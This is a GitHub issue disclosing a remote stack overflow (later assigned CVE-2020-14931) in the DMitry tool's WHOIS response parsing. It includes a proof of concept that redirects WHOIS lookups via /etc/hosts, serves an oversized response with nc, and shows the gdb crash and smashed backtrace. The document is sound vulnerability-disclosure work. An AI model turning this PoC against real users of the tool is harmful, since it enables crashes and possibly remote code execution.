Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote Stack Overflow (possible RCE) #4

Closed
carter-yagemann opened this issue Jun 19, 2020 · 1 comment
Closed

Remote Stack Overflow (possible RCE) #4

carter-yagemann opened this issue Jun 19, 2020 · 1 comment

Comments

@carter-yagemann
Copy link
Contributor

carter-yagemann commented Jun 19, 2020

Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141		if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.

@carter-yagemann
Copy link
Contributor Author

This vulnerability has been assigned CVE-2020-14931.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants